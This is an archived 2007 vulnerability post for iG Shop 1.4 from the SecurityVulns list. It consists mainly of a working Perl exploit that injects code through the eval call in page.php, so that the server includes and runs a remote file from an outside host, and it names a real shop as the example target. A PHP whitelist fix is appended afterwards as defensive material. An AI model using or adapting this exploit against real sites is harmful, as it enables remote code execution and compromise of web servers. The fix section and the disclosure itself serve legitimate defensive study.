Information Security

From: ifx_(at)_cupu.us <ifx_(at)_cupu.us>
Date: June 19, 2007
Subject: iG Shop 1.4 eval Inclusion Vulnerability

#!/usr/bin/perl -w
use LWP::UserAgent;
####################################################################
#iG Shop 1.4 eval Inclusion Vulnerability
#found by IFX #nyubicrew
#Vulnerability on page.php
#if (!$action)
#       $action = "make";
#// here the function will be called.
#eval ("page_$action();");
####################################################################
die "Example: perl $0 http://www.planetgolfuk.co.uk/shop\n" unless @ARGV;

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$url = $ARGV[0] . "/page.php?action=|include(\$_GET\[cok\]);//phpinfo&cok=http://h1.ripside.net/ifx/a.txt?";

$res = $b->request(HTTP::Request->new(GET=>$url));
$respone = $res->content;

if ($respone =~ /nyelipin file ;P/i){
       print "\nTembus...\n";
       print "\n$url\n";
}
else{
       print "\nGagal cok...\n";
}
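
The comment block at the top of the script quotes the flaw in page.php: the `action` request parameter is interpolated into a string that is passed to `eval`. A fix for that pattern, as an added example that is not part of the original post and not iG Shop's own code; it assumes PHP 7 or later, and `page_view`, `PAGE_ACTIONS` and `dispatch_page` are hypothetical names:

```php
<?php
// Added example; not iG Shop code. page_view() is a hypothetical second handler.

function page_make(): string { return 'make page'; }
function page_view(): string { return 'view page'; }   // hypothetical

// Fixed map from accepted action names to handlers. The request value is
// only ever used as a lookup key, never as part of evaluated code.
const PAGE_ACTIONS = [
    'make' => 'page_make',
    'view' => 'page_view',
];

function dispatch_page(array $query): string
{
    $action = $query['action'] ?? '';
    // action[]=x arrives as an array; treat anything that is not a
    // non-empty string as absent, which selects the default "make".
    if (!is_string($action) || $action === '') {
        $action = 'make';
    }
    if (!array_key_exists($action, PAGE_ACTIONS)) {
        // Log a printable, length-limited copy for later review.
        $shown = substr(preg_replace('/[^\x20-\x7e]/', '?', $action), 0, 80);
        error_log('page.php: rejected action "' . $shown . '"');
        return 'unknown action';
    }
    $handler = PAGE_ACTIONS[$action];
    return $handler();
}

// Constructed sample requests; the last value has the shape used in the post.
if (PHP_SAPI === 'cli') {
    $samples = [
        [],
        ['action' => 'view'],
        ['action' => ['x']],
        ['action' => '|include($_GET[cok]);//phpinfo'],
    ];
    foreach ($samples as $q) {
        echo json_encode($q), ' => ', dispatch_page($q), "\n";
    }
}
```

In page.php the call would be `dispatch_page($_GET)` in place of the `eval` line.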

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod